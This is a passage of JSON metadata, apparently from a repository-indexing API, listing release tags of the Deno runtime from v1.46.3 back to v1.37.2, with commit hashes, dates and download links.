o/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/